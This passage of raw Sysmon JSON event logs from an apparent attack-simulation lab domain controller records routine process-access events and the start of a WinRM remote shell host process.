07:53:47.751","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2429,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.751\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.751","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2430,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.751\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.751","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2431,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.751\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.751","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2432,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.751\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.751","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2433,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.751\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.751","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2434,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.751\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F8B-5F25-0000-0010585A0400}\r\nTargetProcessId: 2328\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.751","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F8B-5F25-0000-0010585A0400}","TargetProcessId":"2328","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2435,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.766\r\nSourceProcessGUID: {41C8662E-1F8B-5F25-0000-0010585A0400}\r\nSourceProcessId: 2328\r\nSourceThreadId: 3408\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1F8B-5F25-0000-0010BA590400}\r\nTargetProcessId: 4012\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.766","SourceProcessGUID":"{41C8662E-1F8B-5F25-0000-0010585A0400}","SourceProcessId":"2328","SourceThreadId":"3408","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1F8B-5F25-0000-0010BA590400}","TargetProcessId":"4012","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2436,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.766\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F8B-5F25-0000-0010BA590400}\r\nTargetProcessId: 4012\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.766","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F8B-5F25-0000-0010BA590400}","TargetProcessId":"4012","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2437,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.788\r\nProcessGuid: {41C8662E-1F8B-5F25-0000-0010E05C0400}\r\nProcessId: 4108\r\nImage: C:\\Windows\\System32\\winrshost.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Host Process for WinRM's Remote Shell plugin\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: winrshost.exe\r\nCommandLine: C:\\Windows\\system32\\WinrsHost.exe -Embedding\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-1F88-5F25-0000-0020B3460400}\r\nLogonId: 0x446B3\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96\r\nParentProcessGuid: 